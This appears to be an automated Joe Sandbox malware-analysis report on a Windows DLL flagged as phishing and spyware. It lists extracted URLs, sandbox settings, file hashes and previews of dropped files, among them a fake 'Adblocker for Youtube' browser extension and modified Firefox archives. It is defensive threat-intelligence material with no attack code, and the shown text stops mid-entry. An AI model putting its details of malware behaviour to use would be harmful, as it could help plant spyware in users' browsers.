https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifakrundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748431003.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748391683.0000000003385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp, Secure Preferences.3.drfalse
  • Avira URL Cloud: safe
unknown
https://duckduckgo.com/?q=omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://chrome.google.com/webstorerundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://drive-daily-2.corp.google.com/rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://payments.google.com/payments/v4/js/integrator.jsrundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fpn.firefox.comomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protectionsomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaprefs.js_tempHROxPC.3.drfalse
  • Avira URL Cloud: safe
unknown
https://schema.orgomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
Name:https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://drive-daily-1.corp.google.com/
Source:rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://drive-daily-5.corp.google.com/
Source:rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://groups.google.com/forum/#
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1709666
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1433118
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1437038
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://www.maps.google.com/a/place
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1678378
Source:omni.ja.bak.3.dr
Malicious:false
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://mitmdetection.services.mozilla.com/
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://chrome.google.com/webstoreC
Source:rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://static.adsafeprotected.com/firefox-etp-js
Source:rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:http://certs.starfieldtech.com/repository/
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://github.com/mozilla-services/mozilla-pipeline-schemas
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://searchfox.org/mozilla-central/search?q=search-telemetry-schema.json
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://drive-preprod.corp.google.com/
Source:rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1392378
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://sandbox.google.com/
Source:rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1334069
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://www.google.com/?h=6fiz7bk1dli28pjdzprzc2iifgzk4e22xjoo.ja7lk70wr
Source:rundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748301069.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1379974
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1465399
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://ipfs.io/ipfs/QmXoypizjW3WknFiJnKLwHCnL72vedxjQkDDP1mXWo6uco/wiki/List_of_Google_domains.html
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: phishing
Reputation:unknown
Name:https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:http://certificates.godaddy.com/repository
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://deploy-preview-1234--perf-html.netlify.com
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1309305
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1458321
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://monitor.firefox.com/user/dashboard
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:http://mozilla.org/foo/bar/b
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://opengraphprotocol.org/)
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1719704
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1263733
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1688277
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://monitor.firefox.com/about
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:http://mozilla.org/MPL/2.0/.
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:http://schema.org
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1539007
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://coverage.mozilla.org
Source:omni.ja.bak.3.dr
Malicious:false
  • URL Reputation: safe
Reputation:unknown
Name:https://deploy-preview-1234--perf-html.netlify.com/
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://sandbox.google.com/payments/v4/js/integrator.js8
Source:rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://bugzilla.mozilla.org/show_bug.cgi?id=1436524
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
Name:https://deploy-preview-1234567--perf-html.netlify.app
Source:omni.ja.bak.3.dr
Malicious:false
  • Avira URL Cloud: safe
Reputation:unknown
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1502263
Start date and time:2024-08-31 21:58:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 56s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:GqjUrFW.dll
Detection:MAL
Classification:mal84.phis.spyw.winDLL@10/143@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .dll
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.185.170, 142.250.74.202, 142.250.184.202, 172.217.16.202, 142.250.185.138, 216.58.206.42, 142.250.186.170, 142.250.185.202, 142.250.185.234, 172.217.18.10, 142.250.186.42, 142.250.186.74, 142.250.184.234, 142.250.185.106, 216.58.206.74, 142.250.181.234
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, www.googleapis.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:58:59 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
No context
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):656934
Entropy (8bit):4.833443692601012
Encrypted:false
SSDEEP:6144:AZesRBvWTxOdD/xwa4+5DB4g3WdEahAGNdYpw516j:ALyqdElHCj
MD5:B1BCDCB19FA86C839994BC26C6789A1E
SHA1:0D83BD1A08B94BC48934D25DFCDC58BEA826D125
SHA-256:A3485D48EAC6B7DFE15E9EFD2FFC8976BFD765704477022841F84FAEC35507A1
SHA-512:6C6CCAE35B0D58E6ACA5826A4F1931E78BA9C3426C63B5CCFE38667B40D5852FD7281ACDE1964AE8D194AB760EA20A039509EBB2CC2A191BD8C4450B49D2CB40
Malicious:false
Reputation:low
Preview:PK.........e.Y"y_.............icons/ficon128.png.PNG........IHDR..............>a.....bKGD..............pHYs.................tIME.....%&.OMe...:IDATx..]i...y~.....].V+iW.t@.'.....?...(...._.cc.p...9.........%s(...U&.WH%N.J~.8.l.T...5.`........7?.g...{.{.ggv.......{...... .\r.%.\r.%.\r.%.\r.%.\r.%.\r.%.\FI.Z..5..C1..Z...o..x...|....{&....*.P.....R.v....U....TN......K...t.X....{...m.3?X.{.$.......".. .+. yR._7.....+}.m... ...T......AY....@BC........2;<`.. ...W...,.)..r..Mj.;.......[....'..!....B....G.ulw...i.I.v.0......U.Cw. ..`W.....H.....@.k...Q.faW...0..'z.$!....Cw]/K[.N...CE...`.......k..p.^.zc,./..3E...^a..&.P.PKpm.......n-..6.}m...#[.......71s.Q......^/."A`.?.....(.....D ..._...S.........k......|q...-.U..l....j...S).}...._...W2....Y@...CwJ}b.Y.`(...O.=o.s..V.:.R_.`...0.D.J(.....]0.....8.U../!y...wh...$.P......o.W..PL\...=3..bL.....i(...*..]..xX.....G...L..f.Bb.c.{f....G......kn..w.4,.......u;af@.a..E..+~..Z...f...=..C.4../'.. ....-.x.
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Zip archive data, made by v2.0 UNIX, extract using at least v1.0, last modified Wed Dec 19 21:00:48 2001, uncompressed size 74946, method=store
Category:dropped
Size (bytes):42504742
Entropy (8bit):5.623098227510791
Encrypted:false
SSDEEP:98304:Ss4U4Rdk80NRbMa2+p9D8k27H51mubWaJlcaTyC09E8JXboiIiVipxqS:Ud0vF9D8k27tyalnsXXgxj
MD5:71EF2AD1D467D621B2BDA9DD74AA30E6
SHA1:E0C0043354F8097FD172D58DCAEAE196D6A07EA6
SHA-256:FE1B62E3BEACBDC7566F823D03BAA6A7D089C4D5ADB4BE78BA8ED7EBA658309C
SHA-512:4F59C29406BD1DB5CE84876EE596F316AB355A598DB4BABC59DDA9A5699BE8A8DFE8E9E676C3CA88684CF0F2549F1F4FB19BCCB239FC57651F685401F41A605F
Malicious:false
Reputation:low
Preview:.DQ.PK............!<.j...$...$....................defaults/preferences/firefox.jsPK............!<....;...;...$.................defaults/preferences/firefox-l10n.jsPK............!<..}.........(.................defaults/preferences/firefox-branding.jsPK............!<....[...[... .............["..defaults/preferences/debugger.jsPK............!<..Y.H...H.....................chrome.manifestPK............!<.........................i/..chrome/chrome.manifestPK............!<#TS.#...#.................U6..components/components.manifestPK............!<............3..............9..chrome/browser/content/browser/built_in_addons.jsonPK............!<..!.O...O...-.............";..chrome/en-US/locale/branding/brand.propertiesPK............!<S...........=..............;..localization/en-US/browser/identityCredentialNotification.ftlPK............!<:./.........*..............?..localization/en-US/browser/screenshots.ftlPK............!<...\........&..............J..localization/en-US/browser/panelUI.ftlP
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Zip archive data, made by v2.0 UNIX, extract using at least v1.0, last modified Wed Dec 19 21:00:48 2001, uncompressed size 74946, method=store
Category:dropped
Size (bytes):42504668
Entropy (8bit):5.623098682895427
Encrypted:false
SSDEEP:98304:+s4U4Rdk80NRbMa2+p9D8k27H51mubWaJlcaTyC09E8JXboiIiVipxqS:4d0vF9D8k27tyalnsXXgxj
MD5:250D9B7A20B36C3662A25E4CC773AFED
SHA1:D5B0929628DFA373E90B8573606E7678FA6F36E3
SHA-256:D81A8A3BF247BC54EDC6F57689D62CD6F1DA75D17D6F0EEE4D9DA4A9A563798B
SHA-512:AB589D7DF354D3EFB7C77A7AB3B590F075D69BEB6A9195DF6A6C11C596EDFF8303FB5D2BB4F501D5DEC1D207A68A1409AAFC7932588877178BDFE5629D306EF1
Malicious:false
Reputation:moderate, very likely benign file
Preview:.DQ.PK............!<.j...$...$....................defaults/preferences/firefox.jsPK............!<....;...;...$.................defaults/preferences/firefox-l10n.jsPK............!<..}.........(.................defaults/preferences/firefox-branding.jsPK............!<....[...[... .............["..defaults/preferences/debugger.jsPK............!<..Y.H...H.....................chrome.manifestPK............!<.........................i/..chrome/chrome.manifestPK............!<#TS.#...#.................U6..components/components.manifestPK............!<E...........3..............9..chrome/browser/content/browser/built_in_addons.jsonPK............!<..!.O...O...-..............:..chrome/en-US/locale/branding/brand.propertiesPK............!<S...........=.............r;..localization/en-US/browser/identityCredentialNotification.ftlPK............!<:./.........*..............>..localization/en-US/browser/screenshots.ftlPK............!<...\........&..............I..localization/en-US/browser/panelUI.ftlP
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):204
Entropy (8bit):4.8508578194566825
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U30D50ogHfJf89abu/1:4dm1SlAeFUMT+EAI1
MD5:5A56E498EACF6CEED5F1C69EDAF05441
SHA1:96EB7F2EEF6D5EEB2D164FD289A7A70777E19E48
SHA-256:C381EAC12310F44DBB7E80C12B99B536173339063C004747587A826C5CE414E4
SHA-512:D1148843FD0D313491423FB1FCFA12511080AC91191609315B5B5CD34666534BCA0BD8A6FBD12584450447E39AE058FB6FB8E666AAAC00EB4AA18985612AE0C8
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... .......... .......... ... YouTube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.8038077324770025
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHATC6Wq8vEj/EXQ3YJMWVAVIQ2gBT1n:bk/dP6GtVR7s6kv3goJXW1
MD5:9558EF405369500EC74EC48B16C67123
SHA1:7A55A51AB242AAAB70B475CA244D58435ED18CDC
SHA-256:AFBC3A7F222C6C4AAC9BB72ACB89079751F1B26BCFB622AABFF3095D35E953C0
SHA-512:2FB9B297A00D30CD36C3881416360AB4C9305B148BAE4914F13C081713BF8FD921C9E8105EC1653BCB9258078509C5F425091B17482F5A7C633195DADEC59658
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Est.s buscant v.deo adblock? Pel descarregar Adblocker per a Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):144
Entropy (8bit):4.942456752756783
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVXKd5gBBVR7WHNJcRAi2eCnngXR56WWVXKd5gBT1n:bk/dP6Gn24VR7MJcRAi3+gB56/2W1
MD5:524629E383646EE89AB2F678B4BE3FF6
SHA1:F0BDE6E032863D43AB147EFC39CAEF69FC9D7515
SHA-256:2D09BA1FD1682BE5630353AEF92E3EB7F6BF82FA6E86CF6EDB38102D2B6811E3
SHA-512:D4DFCED5F83A9E000DFA52A07E42BAD63E983E68FD9E9A32601E43F5EE4F5C0DB0050DDEC99847B5DFDF7A5DE9B32DF0DFCD5EE0F16591698B8CEBF7C57126D2
Malicious:false
Preview:.{"appName":{"message":"Adblocker pro Youtube."},"appDesc":{"message":"Hled.te video adblock? Tak.e st.hnout Adblocker pro Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.921700724720227
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWRMgFBBVR7WHA0algFkdCg1BKS9rIHWWRMgFBT1n:bk/dP6GVVVR7NgFsV1BKS9r69f1
MD5:F013F8F66453B7BB32ADFBAB94F43265
SHA1:6792CCC65AD371F2222FD11E3B994ECEB1376F7D
SHA-256:BC000154FEA83481537A4F9DBAB369970E83CA8335E52C451D9363C2BED20F45
SHA-512:85E835A25F47AA5C222264FB3ED65BAE37E7451C86BCBC634C4F145A1C58ED369321474CBA5FA9F1B10FD09370E399C24ACBFCE6C95BD81474F360B3F3AFF5F2
Malicious:false
Preview:.{"appName":{"message":"Adblocker til Youtube."},"appDesc":{"message":"Er du p. udkig efter video adblock? S. download Adblocker til Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):157
Entropy (8bit):4.946253849862891
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmZXizBBVR7WHWM1FaDEXgsvDM2KIEBpKGOWJFIHJKZWDmZXizL:bk/dP6GpVR7c1FCsLlKnOvHJKQ1
MD5:DE39EA44F2A12A934757A93C64251ACB
SHA1:61AFFEF1FC9FF528424F9147D6C056975092F233
SHA-256:66A7A4DE9D4A548E9109821EF598273032833B5644BF1157BF4045E9A14782B4
SHA-512:32052DFBE47177EDBE1181F91FD10FEB81EA00413D8090CDB52E048B3C605AB97AEB73B65624B4F5460DB47AF37513FCF076A2E4054C1DF3DEE21FBC2EEA6F62
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Sind Sie auf der Suche nach video-adblock? So laden Adblocker f.r Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):197
Entropy (8bit):4.9739986021611635
Encrypted:false
SSDEEP:6:bk/dP6GLAQhqb4VR7K6ITsfva9WlroZIAQhqbW1:4dFvIbYFE6roZIvIbW1
MD5:09A7A7CD38C78FF410EEDE8878408C74
SHA1:99D3EA931D32B960E3CEB71668C5A2184E14ADD1
